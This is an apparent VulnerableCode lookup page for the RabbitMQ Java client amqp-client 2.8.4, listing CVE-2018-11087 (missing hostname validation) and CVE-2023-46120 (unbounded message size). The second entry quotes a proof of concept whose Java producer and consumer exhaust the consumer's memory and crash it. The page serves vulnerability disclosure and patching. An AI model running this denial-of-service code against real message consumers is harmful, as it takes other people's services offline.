Lookup for vulnerable packages by Package URL.
| Purl | pkg:maven/com.rabbitmq/amqp-client@2.8.4 |
|---|
| Type | maven |
|---|
| Namespace | com.rabbitmq |
|---|
| Name | amqp-client |
|---|
| Version | 2.8.4 |
|---|
| Qualifiers |
|
|---|
| Subpath | |
|---|
| Is_vulnerable | true |
|---|
| Next_non_vulnerable_version | 5.18.0 |
|---|
| Latest_non_vulnerable_version | 5.18.0 |
|---|
| Affected_by_vulnerabilities |
| 0 |
| url |
VCID-cuf7-182f-9ubm |
| vulnerability_id |
VCID-cuf7-182f-9ubm |
| summary |
Improper Certificate Validation
Pivotal Spring AMQP, 1.x versions prior to 1.7.10 and 2.x versions prior to 2.0.6, expose a man-in-the-middle vulnerability due to lack of hostname validation. A malicious user that has the ability to intercept traffic would be able to view data in transit. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2018-11087, GHSA-w4g2-9hj6-5472
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-cuf7-182f-9ubm |
|
| 1 |
| url |
VCID-ktt4-hm4k-9qcf |
| vulnerability_id |
VCID-ktt4-hm4k-9qcf |
| summary |
RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack
### Summary
`maxBodyLebgth` was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.
### PoC
#### RbbitMQ
* Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
* Start RabbitMQ
#### Producer
* Build a String of length 256M and send it to Consumer
```
package org.springframework.amqp.helloworld;
import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
public class Producer {
public static void main(String[] args) {
ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
String s = "A";
for(int i=0;i<28;++i){
s = s + s;
System.out.println(i);
}
amqpTemplate.convertAndSend(s);
System.out.println("Send Finish");
}
}
```
#### Consumer
* First set the heap memory size to 128M
* Read the message sent by the Producer from the MQ and print the length
```
package org.springframework.amqp.helloworld;
import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
public class Consumer {
public static void main(String[] args) {
ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
Object o = amqpTemplate.receiveAndConvert();
if(o != null){
String s = o.toString();
System.out.println("Received Length : " + s.length());
}else{
System.out.println("null");
}
}
}
```
#### Results
* Run the Producer first, then the Consumer
* Consumer throws OOM Exception
### Impact
Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-46120, GHSA-mm8h-8587-p46h
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ktt4-hm4k-9qcf |
|
|
|---|
| Fixing_vulnerabilities |
|
|---|
| Risk_score | 3.1 |
|---|
| Resource_url | http://public2.vulnerablecode.io/packages/pkg:maven/com.rabbitmq/amqp-client@2.8.4 |
|---|